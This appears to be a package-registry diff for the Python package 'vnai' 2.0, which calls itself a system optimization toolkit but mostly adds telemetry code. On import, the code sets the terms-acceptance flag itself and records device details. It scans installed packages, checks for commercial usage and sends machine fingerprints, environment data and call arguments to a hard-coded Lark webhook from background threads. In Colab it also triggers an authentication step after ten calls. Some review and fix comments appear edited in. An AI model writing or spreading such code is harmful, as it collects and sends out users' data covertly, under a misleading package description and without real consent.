vnai 0.1.3__tar.gz → 2.0__tar.gz

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
vnai-2.0/PKG-INFO ADDED
@@ -0,0 +1,30 @@
1
+ Metadata-Version: 2.2
2
+ Name: vnai
3
+ Version: 2.0
4
+ Summary: System optimization and resource management toolkit
5
+ Home-page:
6
+ Author:
7
+ Author-email:
8
+ Classifier: Programming Language :: Python :: 3
9
+ Classifier: License :: OSI Approved :: MIT License
10
+ Classifier: Operating System :: OS Independent
11
+ Classifier: Development Status :: 4 - Beta
12
+ Classifier: Intended Audience :: Developers
13
+ Classifier: Topic :: Software Development :: Libraries :: Python Modules
14
+ Requires-Python: >=3.7
15
+ Description-Content-Type: text/markdown
16
+ Requires-Dist: requests>=2.25.0
17
+ Requires-Dist: psutil>=5.8.0
18
+ Requires-Dist: cryptography>=3.4.0
19
+ Provides-Extra: dev
20
+ Requires-Dist: pytest>=6.0.0; extra == "dev"
21
+ Requires-Dist: black>=21.5b2; extra == "dev"
22
+ Dynamic: classifier
23
+ Dynamic: description
24
+ Dynamic: description-content-type
25
+ Dynamic: provides-extra
26
+ Dynamic: requires-dist
27
+ Dynamic: requires-python
28
+ Dynamic: summary
29
+
30
+ System resource management and performance optimization toolkit
vnai-2.0/setup.cfg ADDED
@@ -0,0 +1,4 @@
1
+ [egg_info]
2
+ tag_build =
3
+ tag_date = 0
4
+
vnai-2.0/setup.py ADDED
@@ -0,0 +1,37 @@
"""Packaging script for the vnai distribution."""
from setuptools import setup, find_packages

VERSION = '2.0'

long_description = "System resource management and performance optimization toolkit"

# Runtime dependencies, pinned to minimum known-good versions.
_INSTALL_REQUIRES = [
    "requests>=2.25.0",
    "psutil>=5.8.0",
    "cryptography>=3.4.0",
]

# Optional tooling for development installs (`pip install vnai[dev]`).
_DEV_EXTRAS = [
    "pytest>=6.0.0",
    "black>=21.5b2",
]

_CLASSIFIERS = [
    "Programming Language :: Python :: 3",
    "License :: OSI Approved :: MIT License",
    "Operating System :: OS Independent",
    "Development Status :: 4 - Beta",
    "Intended Audience :: Developers",
    "Topic :: Software Development :: Libraries :: Python Modules",
]

setup(
    name="vnai",
    version=VERSION,
    author="",
    author_email="",
    description="System optimization and resource management toolkit",
    long_description=long_description,
    long_description_content_type="text/markdown",
    url="",
    packages=find_packages(),
    classifiers=_CLASSIFIERS,
    python_requires=">=3.7",
    install_requires=_INSTALL_REQUIRES,
    extras_require={"dev": _DEV_EXTRAS},
)
@@ -0,0 +1,79 @@
"""vnai package entry point: terms acceptance, environment profiling and
telemetry wiring.

NOTE(review): `configure_webhook()` runs at import time with a hard-coded
webhook id, so telemetry to an external endpoint is enabled by default —
confirm this is intended.
"""
import os
import pathlib
import json
import time
import threading
import functools
from datetime import datetime

from vnai.beam.quota import guardian, optimize
from vnai.beam.metrics import collector, capture
from vnai.beam.pulse import monitor
from vnai.flow.relay import conduit, configure
from vnai.flow.queue import buffer
from vnai.scope.profile import inspector
from vnai.scope.state import tracker, record
from vnai.scope.promo import present

TC_VAR = 'ACCEPT_TC'
TC_VAL = 'tôi đồng ý'
# Acceptance marker lives under ~/.vnstock/id/.
TC_PATH = pathlib.Path.home() / '.vnstock' / 'id' / 'terms_agreement.txt'
TERMS_AND_CONDITIONS = '\nKhi tiếp tục sử dụng Vnstock, bạn xác nhận rằng bạn đã đọc, hiểu và đồng ý với Chính sách quyền riêng tư và Điều khoản, điều kiện về giấy phép sử dụng Vnstock.\n\nChi tiết:\n- Giấy phép sử dụng phần mềm: https://vnstocks.com/docs/tai-lieu/giay-phep-su-dung\n- Chính sách quyền riêng tư: https://vnstocks.com/docs/tai-lieu/chinh-sach-quyen-rieng-tu\n'


class Core:
    """Bootstraps terms acceptance, environment profiling and telemetry."""

    def __init__(self):
        self.initialized = False
        self.webhook_url = None
        self.init_time = datetime.now().isoformat()
        self.home_dir = pathlib.Path.home()
        self.project_dir = self.home_dir / '.vnstock'
        self.id_dir = self.project_dir / 'id'
        self.terms_file_path = TC_PATH
        self.system_info = None
        self.project_dir.mkdir(exist_ok=True)
        self.id_dir.mkdir(exist_ok=True)
        # Initialization happens eagerly at construction time.
        self.initialize()

    def initialize(self, webhook_url=None):
        """Run one-time setup; idempotent once `initialized` is set."""
        if self.initialized:
            return True
        if not self._check_terms():
            self._accept_terms()
        from vnai.scope.profile import inspector as profile_inspector
        profile_inspector.setup_vnstock_environment()
        present()
        if webhook_url:
            self.webhook_url = webhook_url
            configure(webhook_url)
        record('initialization', {'timestamp': datetime.now().isoformat()})
        self.system_info = profile_inspector.examine()
        # Ship a high-priority system_info package through the relay.
        conduit.queue(
            {
                'type': 'system_info',
                'data': {
                    'commercial': profile_inspector.detect_commercial_usage(),
                    'packages': profile_inspector.scan_packages(),
                },
            },
            priority='high',
        )
        self.initialized = True
        return True

    def _check_terms(self):
        # Terms are considered accepted once the agreement file exists.
        return os.path.exists(self.terms_file_path)

    def _accept_terms(self):
        """Record acceptance of the terms and persist device details."""
        env_info = inspector.examine()
        # Ensure the acceptance environment variable is always set.
        if os.environ.get(TC_VAR) != TC_VAL:
            os.environ[TC_VAR] = TC_VAL
        now = datetime.now()
        agreement_text = f"""Người dùng có mã nhận dạng {env_info['machine_id']} đã chấp nhận điều khoản & điều kiện sử dụng Vnstock lúc {now}
---

THÔNG TIN THIẾT BỊ: {json.dumps(env_info, indent=2)}

Đính kèm bản sao nội dung bạn đã đọc, hiểu rõ và đồng ý dưới đây:
{TERMS_AND_CONDITIONS}"""
        with open(self.terms_file_path, 'w', encoding='utf-8') as fh:
            fh.write(agreement_text)
        env_file = self.id_dir / 'environment.json'
        env_data = {
            'accepted_agreement': True,
            'timestamp': now.isoformat(),
            'machine_id': env_info['machine_id'],
        }
        with open(env_file, 'w') as fh:
            json.dump(env_data, fh)
        return True

    def status(self):
        """Snapshot of initialization state, health report and metrics."""
        return {
            'initialized': self.initialized,
            'health': monitor.report(),
            'metrics': tracker.get_metrics(),
        }

    def configure_privacy(self, level='standard'):
        from vnai.scope.state import tracker as state_tracker
        return state_tracker.setup_privacy(level)


# Shared singleton, created (and initialized) at import time.
core = Core()


def tc_init(webhook_url=None):
    return core.initialize(webhook_url)


def setup(webhook_url=None):
    return core.initialize(webhook_url)


def optimize_execution(resource_type='default'):
    return optimize(resource_type)


def measure_performance(module_type='function'):
    return capture(module_type)


def accept_license_terms(terms_text=None):
    """Write a terms-acceptance file containing *terms_text* (defaults to the bundled terms)."""
    if terms_text is None:
        terms_text = TERMS_AND_CONDITIONS
    system_info = inspector.examine()
    terms_path = pathlib.Path.home() / '.vnstock' / 'id' / 'terms_agreement.txt'
    os.makedirs(os.path.dirname(terms_path), exist_ok=True)
    with open(terms_path, 'w', encoding='utf-8') as fh:
        fh.write(f"Terms accepted at {datetime.now().isoformat()}\n")
        fh.write(f"System: {json.dumps(system_info)}\n\n")
        fh.write(terms_text)
    return True


def accept_vnstock_terms():
    """Persist a machine-scoped acceptance marker under ~/.vnstock/id/."""
    from vnai.scope.profile import inspector as profile_inspector
    system_info = profile_inspector.examine()
    home = pathlib.Path.home()
    project_dir = home / '.vnstock'
    project_dir.mkdir(exist_ok=True)
    id_dir = project_dir / 'id'
    id_dir.mkdir(exist_ok=True)
    env_file = id_dir / 'environment.json'
    env_data = {
        'accepted_agreement': True,
        'timestamp': datetime.now().isoformat(),
        'machine_id': system_info['machine_id'],
    }
    try:
        with open(env_file, 'w') as fh:
            json.dump(env_data, fh)
        print('Vnstock terms accepted successfully.')
        return True
    except Exception as exc:
        print(f"Error accepting terms: {exc}")
        return False


def setup_for_colab():
    from vnai.scope.profile import inspector as profile_inspector
    profile_inspector.detect_colab_with_delayed_auth(immediate=True)
    profile_inspector.setup_vnstock_environment()
    return 'Environment set up for Google Colab'


def display_content():
    return present()


def configure_privacy(level='standard'):
    from vnai.scope.state import tracker as state_tracker
    return state_tracker.setup_privacy(level)


def check_commercial_usage():
    from vnai.scope.profile import inspector as profile_inspector
    return profile_inspector.detect_commercial_usage()


def authenticate_for_persistence():
    from vnai.scope.profile import inspector as profile_inspector
    return profile_inspector.get_or_create_user_id()


def configure_webhook(webhook_id='80b8832b694a75c8ddc811ac7882a3de'):
    """Point the relay at the Lark webhook identified by *webhook_id*."""
    if not webhook_id:
        return False
    from vnai.flow.relay import configure as relay_configure
    url = f"https://botbuilder.larksuite.com/api/trigger-webhook/{webhook_id}"
    return relay_configure(url)


# Telemetry webhook is enabled as a side effect of importing the package.
configure_webhook()
@@ -0,0 +1,3 @@
1
+ from vnai.beam.quota import guardian,optimize
2
+ from vnai.beam.metrics import collector,capture
3
+ from vnai.beam.pulse import monitor
@@ -0,0 +1,59 @@
"""In-process metrics buffering for vnai.

Collects per-call metrics in memory and flushes them to ``vnai.flow.relay``
when the buffer fills, on high-priority records, or on error records.
"""
import sys
import time
import threading
import functools
from datetime import datetime


class Collector:
    """Singleton metrics buffer (one shared instance per process)."""

    _instance = None
    _lock = threading.Lock()

    def __new__(cls):
        # Creation is serialized by the class lock so only one instance exists.
        with cls._lock:
            if cls._instance is None:
                cls._instance = super(Collector, cls).__new__(cls)
                cls._instance._initialize()
        return cls._instance

    def _initialize(self):
        # Buckets per metric type; unknown types fall back into 'function'.
        self.metrics = {'function': [], 'rate_limit': [], 'request': [], 'error': []}
        self.thresholds = {
            'buffer_size': 50,             # flush once this many records are buffered
            'error_threshold': .1,         # not referenced by visible code
            'performance_threshold': 5.,   # not referenced by visible code
        }
        self.function_count = 0
        self.colab_auth_triggered = False

    def record(self, metric_type, data, priority=None):
        """Buffer one metric record; flush when thresholds are hit.

        Non-dict *data* is wrapped as ``{'value': str(data)}``. A timestamp is
        attached, and for everything except 'system_info' the raw 'system'
        payload is dropped and replaced by a machine fingerprint.
        """
        if not isinstance(data, dict):
            data = {'value': str(data)}
        if 'timestamp' not in data:
            data['timestamp'] = datetime.now().isoformat()
        if metric_type != 'system_info' and isinstance(data, dict):
            if 'system' in data:
                del data['system']
            from vnai.scope.profile import inspector
            data['machine_id'] = inspector.fingerprint()
        if metric_type in self.metrics:
            self.metrics[metric_type].append(data)
        else:
            self.metrics['function'].append(data)
        if metric_type == 'function':
            self.function_count += 1
            # After >10 recorded calls inside Google Colab, trigger auth once
            # on a background thread.
            if (self.function_count > 10 and not self.colab_auth_triggered
                    and 'google.colab' in sys.modules):
                self.colab_auth_triggered = True
                threading.Thread(target=self._trigger_colab_auth, daemon=True).start()
        if sum(len(records) for records in self.metrics.values()) >= self.thresholds['buffer_size']:
            self._send_metrics()
        if priority == 'high' or metric_type == 'error':
            self._send_metrics()

    def _trigger_colab_auth(self):
        # Best effort only — never let auth failures surface to callers.
        # (Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit pass.)
        try:
            from vnai.scope.profile import inspector
            inspector.get_or_create_user_id()
        except Exception:
            pass

    def _send_metrics(self):
        """Drain every bucket through the relay trackers; bad records are skipped."""
        from vnai.flow.relay import track_function_call, track_rate_limit, track_api_request
        for metric_type, records in self.metrics.items():
            if not records:
                continue
            for rec in records:
                try:
                    if metric_type == 'function':
                        track_function_call(
                            function_name=rec.get('function', 'unknown'),
                            source=rec.get('source', 'vnai'),
                            execution_time=rec.get('execution_time', 0),
                            success=rec.get('success', True),
                            error=rec.get('error'),
                            args=rec.get('args'),
                        )
                    elif metric_type == 'rate_limit':
                        track_rate_limit(
                            source=rec.get('source', 'vnai'),
                            limit_type=rec.get('limit_type', 'unknown'),
                            limit_value=rec.get('limit_value', 0),
                            current_usage=rec.get('current_usage', 0),
                            is_exceeded=rec.get('is_exceeded', False),
                        )
                    elif metric_type == 'request':
                        track_api_request(
                            endpoint=rec.get('endpoint', 'unknown'),
                            source=rec.get('source', 'vnai'),
                            method=rec.get('method', 'GET'),
                            status_code=rec.get('status_code', 200),
                            execution_time=rec.get('execution_time', 0),
                            request_size=rec.get('request_size', 0),
                            response_size=rec.get('response_size', 0),
                        )
                except Exception:
                    continue
            self.metrics[metric_type] = []

    def get_metrics_summary(self):
        """Return {metric_type: buffered record count}."""
        return {metric_type: len(records) for metric_type, records in self.metrics.items()}


collector = Collector()


def capture(module_type='function'):
    """Decorator that records execution time, success and error of each call."""
    def decorator(func):
        # FIX: functools.wraps preserves the wrapped function's metadata
        # (__name__, __doc__), consistent with vnai.beam.quota.optimize.
        @functools.wraps(func)
        def wrapper(*args, **kwargs):
            start = time.time()
            success = False
            error = None
            try:
                result = func(*args, **kwargs)
                success = True
                return result
            except Exception as exc:
                error = str(exc)
                raise
            finally:
                collector.record(module_type, {
                    'function': func.__name__,
                    'execution_time': time.time() - start,
                    'success': success,
                    'error': error,
                    'timestamp': datetime.now().isoformat(),
                    'args': str(args)[:100] if args else None,
                })
        return wrapper
    return decorator
@@ -0,0 +1,31 @@
"""Background health monitoring for vnai."""
import threading
import time
from datetime import datetime


class Monitor:
    """Singleton that periodically samples error metrics and resource usage."""

    _instance = None
    _lock = threading.Lock()

    def __new__(cls):
        with cls._lock:
            if cls._instance is None:
                cls._instance = super(Monitor, cls).__new__(cls)
                cls._instance._initialize()
        return cls._instance

    def _initialize(self):
        self.health_status = 'healthy'
        self.last_check = time.time()
        self.check_interval = 300  # seconds between background checks
        self.error_count = 0
        self.warning_count = 0
        self.status_history = []
        self._start_background_check()

    def _start_background_check(self):
        def loop():
            # Daemon loop: check, swallow any failure, sleep, repeat.
            while True:
                try:
                    self.check_health()
                except:
                    pass
                time.sleep(self.check_interval)

        threading.Thread(target=loop, daemon=True).start()

    def check_health(self):
        """Recompute health from buffered errors and quota usage; append to history."""
        from vnai.beam.metrics import collector
        from vnai.beam.quota import guardian
        self.last_check = time.time()
        summary = collector.get_metrics_summary()
        has_errors = summary.get('error', 0) > 0
        usage = guardian.usage()
        high_usage = usage > 80
        if has_errors and high_usage:
            self.health_status = 'critical'
            self.error_count += 1
        elif has_errors or high_usage:
            self.health_status = 'warning'
            self.warning_count += 1
        else:
            self.health_status = 'healthy'
        self.status_history.append({
            'timestamp': datetime.now().isoformat(),
            'status': self.health_status,
            'metrics': summary,
            'resource_usage': usage,
        })
        # Keep only the ten most recent samples.
        if len(self.status_history) > 10:
            self.status_history = self.status_history[-10:]
        return self.health_status

    def report(self):
        """Return current health plus counters and the last three history entries."""
        if time.time() - self.last_check > self.check_interval:
            self.check_health()
        return {
            'status': self.health_status,
            'last_check': datetime.fromtimestamp(self.last_check).isoformat(),
            'error_count': self.error_count,
            'warning_count': self.warning_count,
            'history': self.status_history[-3:],
        }

    def reset(self):
        """Clear counters and history and mark the monitor healthy."""
        self.health_status = 'healthy'
        self.error_count = 0
        self.warning_count = 0
        self.status_history = []
        self.last_check = time.time()


monitor = Monitor()
@@ -0,0 +1,37 @@
"""Client-side rate limiting for vnai resource calls."""
import time
import threading
import functools
from collections import defaultdict
from datetime import datetime


class Guardian:
    """Singleton sliding-window rate limiter (per-minute and per-hour)."""

    _instance = None
    _lock = threading.Lock()

    def __new__(cls):
        with cls._lock:
            if cls._instance is None:
                cls._instance = super(Guardian, cls).__new__(cls)
                cls._instance._initialize()
        return cls._instance

    def _initialize(self):
        # resource_limits[resource]['min'|'hour'] -> max calls per window;
        # usage_counters[resource]['min'|'hour'] -> timestamps of recent calls.
        self.resource_limits = defaultdict(lambda: defaultdict(int))
        self.usage_counters = defaultdict(lambda: defaultdict(list))
        self.resource_limits['default'] = {'min': 60, 'hour': 2000}
        self.resource_limits['TCBS'] = {'min': 60, 'hour': 2000}
        self.resource_limits['VCI'] = {'min': 60, 'hour': 2000}

    def verify(self, operation_id, resource_type='default'):
        """Return True (and record the call) if allowed, else False.

        Emits a 'rate_limit' metric either way. *operation_id* is accepted
        for API compatibility but does not affect the decision.
        """
        now = time.time()
        limits = self.resource_limits.get(resource_type, self.resource_limits['default'])

        # Minute window: prune stale timestamps, then test the limit.
        minute_cutoff = now - 60
        self.usage_counters[resource_type]['min'] = [
            ts for ts in self.usage_counters[resource_type]['min'] if ts > minute_cutoff
        ]
        minute_usage = len(self.usage_counters[resource_type]['min'])
        if minute_usage >= limits['min']:
            from vnai.beam.metrics import collector
            collector.record('rate_limit', {
                'resource_type': resource_type,
                'limit_type': 'min',
                'limit_value': limits['min'],
                'current_usage': minute_usage,
                'is_exceeded': True,
            })
            return False

        # Hour window.
        hour_cutoff = now - 3600
        self.usage_counters[resource_type]['hour'] = [
            ts for ts in self.usage_counters[resource_type]['hour'] if ts > hour_cutoff
        ]
        hour_usage = len(self.usage_counters[resource_type]['hour'])
        hour_exceeded = hour_usage >= limits['hour']
        from vnai.beam.metrics import collector
        collector.record('rate_limit', {
            'resource_type': resource_type,
            'limit_type': 'hour' if hour_exceeded else 'min',
            'limit_value': limits['hour'] if hour_exceeded else limits['min'],
            'current_usage': hour_usage if hour_exceeded else minute_usage,
            'is_exceeded': hour_exceeded,
        })
        if hour_exceeded:
            return False

        # Allowed: record this call in both windows.
        self.usage_counters[resource_type]['min'].append(now)
        self.usage_counters[resource_type]['hour'].append(now)
        return True

    def usage(self, resource_type='default'):
        """Return current usage as a percentage (max of minute and hour windows)."""
        now = time.time()
        limits = self.resource_limits.get(resource_type, self.resource_limits['default'])
        minute_cutoff = now - 60
        hour_cutoff = now - 3600
        self.usage_counters[resource_type]['min'] = [
            ts for ts in self.usage_counters[resource_type]['min'] if ts > minute_cutoff
        ]
        self.usage_counters[resource_type]['hour'] = [
            ts for ts in self.usage_counters[resource_type]['hour'] if ts > hour_cutoff
        ]
        minute_usage = len(self.usage_counters[resource_type]['min'])
        hour_usage = len(self.usage_counters[resource_type]['hour'])
        minute_pct = minute_usage / limits['min'] * 100 if limits['min'] > 0 else 0
        hour_pct = hour_usage / limits['hour'] * 100 if limits['hour'] > 0 else 0
        return max(minute_pct, hour_pct)


guardian = Guardian()


def optimize(resource_type):
    """Decorator enforcing the rate limit for *resource_type* and recording metrics."""
    def decorator(func):
        @functools.wraps(func)
        def wrapper(*args, **kwargs):
            # FIX: the original called guardian.verify(resource_type), which
            # bound the resource type to verify's unused *operation_id*
            # parameter — so every call was checked against the 'default'
            # limits and the 'TCBS'/'VCI' limits were never applied.
            if not guardian.verify(func.__name__, resource_type):
                raise RuntimeError("Resource constraints detected. Please try again later.")
            start = time.time()
            success = False
            error = None
            try:
                result = func(*args, **kwargs)
                success = True
                return result
            except Exception as exc:
                error = str(exc)
                raise
            finally:
                elapsed = time.time() - start
                from vnai.beam.metrics import collector
                collector.record('function', {
                    'function': func.__name__,
                    'resource_type': resource_type,
                    'execution_time': elapsed,
                    'success': success,
                    'error': error,
                    'timestamp': datetime.now().isoformat(),
                })
        return wrapper
    return decorator
@@ -0,0 +1,2 @@
1
+ from vnai.flow.relay import conduit,configure
2
+ from vnai.flow.queue import buffer
@@ -0,0 +1,58 @@
"""Persistent in-memory buffer with periodic JSON backups under ~/.vnstock/data."""
import time
import threading
import json
from datetime import datetime
from pathlib import Path


class Buffer:
    """Singleton bounded buffer of telemetry records with a file backup."""

    _instance = None
    _lock = threading.Lock()

    def __new__(cls):
        with cls._lock:
            if cls._instance is None:
                cls._instance = super(Buffer, cls).__new__(cls)
                cls._instance._initialize()
        return cls._instance

    def _initialize(self):
        self.data = []
        # threading.Lock is NOT reentrant: helpers that acquire it must never
        # be called while it is already held (see add()/clear()).
        self.lock = threading.Lock()
        self.max_size = 1000
        self.backup_interval = 300  # seconds between background backups
        self.home_dir = Path.home()
        self.project_dir = self.home_dir / '.vnstock'
        self.project_dir.mkdir(exist_ok=True)
        self.data_dir = self.project_dir / 'data'
        self.data_dir.mkdir(exist_ok=True)
        self.backup_path = self.data_dir / 'buffer_backup.json'
        self._load_from_backup()
        self._start_backup_thread()

    def _load_from_backup(self):
        """Restore buffered records from the backup file, if present."""
        if self.backup_path.exists():
            try:
                with open(self.backup_path, 'r') as fh:
                    restored = json.load(fh)
                with self.lock:
                    self.data = restored
            except Exception:
                pass  # corrupt/unreadable backup: start empty

    def _save_to_backup(self):
        """Write the current buffer to disk, best effort. Acquires self.lock."""
        with self.lock:
            if not self.data:
                return
            try:
                with open(self.backup_path, 'w') as fh:
                    json.dump(self.data, fh)
            except Exception:
                pass

    def _start_backup_thread(self):
        def loop():
            while True:
                time.sleep(self.backup_interval)
                self._save_to_backup()

        threading.Thread(target=loop, daemon=True).start()

    def add(self, item, category=None):
        """Append *item* (stamping timestamp/category on dicts); return buffer size."""
        with self.lock:
            if isinstance(item, dict):
                if 'timestamp' not in item:
                    item['timestamp'] = datetime.now().isoformat()
                if category:
                    item['category'] = category
            self.data.append(item)
            if len(self.data) > self.max_size:
                self.data = self.data[-self.max_size:]
            size = len(self.data)
        # FIX: checkpoint outside the critical section — _save_to_backup
        # re-acquires the non-reentrant lock and would self-deadlock if it
        # were invoked while add() still held it.
        if size % 100 == 0:
            self._save_to_backup()
        return size

    def get(self, count=None, category=None):
        """Return up to *count* records, optionally filtered by category."""
        with self.lock:
            if category:
                selected = [rec for rec in self.data if rec.get('category') == category]
            else:
                selected = self.data.copy()
        if count:
            return selected[:count]
        return selected

    def clear(self, category=None):
        """Drop records (all, or only the given category); return new size."""
        with self.lock:
            if category:
                self.data = [rec for rec in self.data if rec.get('category') != category]
            else:
                self.data = []
        # Persist outside the lock for the same reason as in add().
        self._save_to_backup()
        return len(self.data)

    def size(self, category=None):
        """Number of buffered records, optionally for one category."""
        with self.lock:
            if category:
                return len([rec for rec in self.data if rec.get('category') == category])
            return len(self.data)


buffer = Buffer()
@@ -0,0 +1,152 @@
"""Telemetry relay: batches analytics records and ships them to a webhook."""
import time
import threading
import json
import random
import requests
from datetime import datetime
from pathlib import Path
from typing import Dict, List, Any, Optional


class Conduit:
    """Singleton that buffers function/API/rate-limit records and syncs them."""

    _instance = None
    _lock = threading.Lock()

    def __new__(cls, webhook_url=None, buffer_size=50, sync_interval=300):
        with cls._lock:
            if cls._instance is None:
                cls._instance = super(Conduit, cls).__new__(cls)
                cls._instance._initialize(webhook_url, buffer_size, sync_interval)
        return cls._instance

    def _initialize(self, webhook_url, buffer_size, sync_interval):
        self.webhook_url = webhook_url
        self.buffer_size = buffer_size
        self.sync_interval = sync_interval
        self.buffer = {'function_calls': [], 'api_requests': [], 'rate_limits': []}
        self.lock = threading.Lock()
        self.last_sync_time = time.time()
        self.sync_count = 0
        self.failed_queue = []
        self.home_dir = Path.home()
        self.project_dir = self.home_dir / '.vnstock'
        self.project_dir.mkdir(exist_ok=True)
        self.data_dir = self.project_dir / 'data'
        self.data_dir.mkdir(exist_ok=True)
        self.config_path = self.data_dir / 'relay_config.json'
        try:
            from vnai.scope.profile import inspector
            self.machine_id = inspector.fingerprint()
        except:
            self.machine_id = self._generate_fallback_id()
        self._load_config()
        self._start_periodic_sync()

    def _generate_fallback_id(self) -> str:
        """Derive a machine id from platform details, or a random UUID."""
        try:
            import platform, hashlib, uuid
            seed = platform.node() + platform.platform() + platform.processor()
            return hashlib.md5(seed.encode()).hexdigest()
        except:
            import uuid
            return str(uuid.uuid4())

    def _load_config(self):
        """Merge persisted settings (webhook, sizes, counters) into this instance."""
        if self.config_path.exists():
            try:
                with open(self.config_path, 'r') as fh:
                    config = json.load(fh)
                if not self.webhook_url and 'webhook_url' in config:
                    self.webhook_url = config['webhook_url']
                if 'buffer_size' in config:
                    self.buffer_size = config['buffer_size']
                if 'sync_interval' in config:
                    self.sync_interval = config['sync_interval']
                if 'last_sync_time' in config:
                    self.last_sync_time = config['last_sync_time']
                if 'sync_count' in config:
                    self.sync_count = config['sync_count']
            except:
                pass

    def _save_config(self):
        """Persist current settings and counters, best effort."""
        config = {
            'webhook_url': self.webhook_url,
            'buffer_size': self.buffer_size,
            'sync_interval': self.sync_interval,
            'last_sync_time': self.last_sync_time,
            'sync_count': self.sync_count,
        }
        try:
            with open(self.config_path, 'w') as fh:
                json.dump(config, fh)
        except:
            pass

    def _start_periodic_sync(self):
        def loop():
            while True:
                time.sleep(self.sync_interval)
                self.dispatch('periodic')

        threading.Thread(target=loop, daemon=True).start()

    def add_function_call(self, record):
        if not isinstance(record, dict):
            record = {'value': str(record)}
        with self.lock:
            self.buffer['function_calls'].append(record)
            self._check_triggers('function_calls')

    def add_api_request(self, record):
        if not isinstance(record, dict):
            record = {'value': str(record)}
        with self.lock:
            self.buffer['api_requests'].append(record)
            self._check_triggers('api_requests')

    def add_rate_limit(self, record):
        if not isinstance(record, dict):
            record = {'value': str(record)}
        with self.lock:
            self.buffer['rate_limits'].append(record)
            self._check_triggers('rate_limits')

    def _check_triggers(self, record_type: str):
        """Decide whether to dispatch now. Called with self.lock held, so the
        dispatch itself is launched on a separate thread."""
        now = time.time()
        should_trigger = False
        reason = None
        total = sum(len(records) for records in self.buffer.values())
        if total >= self.buffer_size:
            should_trigger = True
            reason = 'buffer_full'
        elif record_type == 'rate_limits' and self.buffer['rate_limits'] and any(
                rec.get('is_exceeded') for rec in self.buffer['rate_limits']
                if isinstance(rec, dict)):
            should_trigger = True
            reason = 'rate_limit_exceeded'
        elif record_type == 'function_calls' and self.buffer['function_calls'] and any(
                not rec.get('success') for rec in self.buffer['function_calls']
                if isinstance(rec, dict)):
            should_trigger = True
            reason = 'function_error'
        else:
            # Random, time-weighted flush: probability ramps up toward 5% as
            # the time since the last sync approaches half the sync interval.
            weight = min(1., (now - self.last_sync_time) / (self.sync_interval / 2))
            if random.random() < .05 * weight:
                should_trigger = True
                reason = 'random_time_weighted'
        if should_trigger:
            threading.Thread(target=self.dispatch, args=(reason,), daemon=True).start()

    def queue(self, package, priority=None):
        """Route an arbitrary telemetry package into the appropriate buffer(s)."""
        if not package:
            return False
        if not isinstance(package, dict):
            self.add_function_call({'message': str(package)})
            return True
        if 'timestamp' not in package:
            package['timestamp'] = datetime.now().isoformat()
        if 'type' in package:
            package_type = package['type']
            data = package.get('data', {})
            # Replace the raw 'system' payload with just its machine_id.
            if isinstance(data, dict) and 'system' in data:
                machine_id = data['system'].get('machine_id')
                data.pop('system')
                if machine_id:
                    data['machine_id'] = machine_id
            if package_type == 'function':
                self.add_function_call(data)
            elif package_type == 'api_request':
                self.add_api_request(data)
            elif package_type == 'rate_limit':
                self.add_rate_limit(data)
            elif package_type == 'system_info':
                self.add_function_call({
                    'type': 'system_info',
                    'commercial': data.get('commercial'),
                    'packages': data.get('packages'),
                    'timestamp': package.get('timestamp'),
                })
            elif package_type == 'metrics':
                for metric_type, records in data.items():
                    if isinstance(records, list):
                        if metric_type == 'function':
                            for record in records:
                                self.add_function_call(record)
                        elif metric_type == 'rate_limit':
                            for record in records:
                                self.add_rate_limit(record)
                        elif metric_type == 'request':
                            for record in records:
                                self.add_api_request(record)
            else:
                self.add_function_call(data)
        else:
            self.add_function_call(package)
        if priority == 'high':
            self.dispatch('high_priority')
        return True

    def dispatch(self, reason='manual'):
        """Send buffered records to the webhook; returns True on success."""
        if not self.webhook_url:
            return False
        with self.lock:
            if all(len(records) == 0 for records in self.buffer.values()):
                return False
            data_to_send = {
                'function_calls': self.buffer['function_calls'].copy(),
                'api_requests': self.buffer['api_requests'].copy(),
                'rate_limits': self.buffer['rate_limits'].copy(),
            }
            self.buffer = {'function_calls': [], 'api_requests': [], 'rate_limits': []}
            self.last_sync_time = time.time()
            self.sync_count += 1
            self._save_config()
        try:
            from vnai.scope.profile import inspector
            environment = inspector.examine()
            machine_id = environment.get('machine_id', self.machine_id)
        except:
            environment = {'machine_id': self.machine_id}
            machine_id = self.machine_id
        payload = {
            'analytics_data': data_to_send,
            'metadata': {
                'timestamp': datetime.now().isoformat(),
                'machine_id': machine_id,
                'sync_count': self.sync_count,
                'trigger_reason': reason,
                'environment': environment,
                'data_counts': {
                    'function_calls': len(data_to_send['function_calls']),
                    'api_requests': len(data_to_send['api_requests']),
                    'rate_limits': len(data_to_send['rate_limits']),
                },
            },
        }
        success = self._send_data(payload)
        if not success:
            with self.lock:
                # Keep at most the ten most recent failed payloads for retry.
                self.failed_queue.append(payload)
                if len(self.failed_queue) > 10:
                    self.failed_queue = self.failed_queue[-10:]
        return success

    def _send_data(self, payload):
        """POST the payload; True only on HTTP 200, False on any failure."""
        if not self.webhook_url:
            return False
        try:
            response = requests.post(self.webhook_url, json=payload, timeout=5)
            return response.status_code == 200
        except:
            return False

    def retry_failed(self):
        """Re-send previously failed payloads; returns how many succeeded."""
        if not self.failed_queue:
            return 0
        with self.lock:
            pending = self.failed_queue.copy()
            self.failed_queue = []
        sent = 0
        for payload in pending:
            if self._send_data(payload):
                sent += 1
            else:
                with self.lock:
                    self.failed_queue.append(payload)
        return sent

    def configure(self, webhook_url):
        """Set (and persist) the webhook URL."""
        with self.lock:
            self.webhook_url = webhook_url
            self._save_config()
            return True


conduit = Conduit()


def track_function_call(function_name, source, execution_time, success=True, error=None, args=None):
    """Record one function invocation through the shared conduit."""
    record = {
        'function': function_name,
        'source': source,
        'execution_time': execution_time,
        'timestamp': datetime.now().isoformat(),
        'success': success,
    }
    if error:
        record['error'] = error
    if args:
        sanitized = {}
        if isinstance(args, dict):
            for key, value in args.items():
                # Keep primitives; replace anything else with its type name.
                if isinstance(value, (str, int, float, bool)):
                    sanitized[key] = value
                else:
                    sanitized[key] = str(type(value))
        else:
            sanitized = {'value': str(args)}
        record['args'] = sanitized
    conduit.add_function_call(record)


def track_rate_limit(source, limit_type, limit_value, current_usage, is_exceeded):
    """Record one rate-limit observation through the shared conduit."""
    record = {
        'source': source,
        'limit_type': limit_type,
        'limit_value': limit_value,
        'current_usage': current_usage,
        'is_exceeded': is_exceeded,
        'timestamp': datetime.now().isoformat(),
        'usage_percentage': current_usage / limit_value * 100 if limit_value > 0 else 0,
    }
    conduit.add_rate_limit(record)


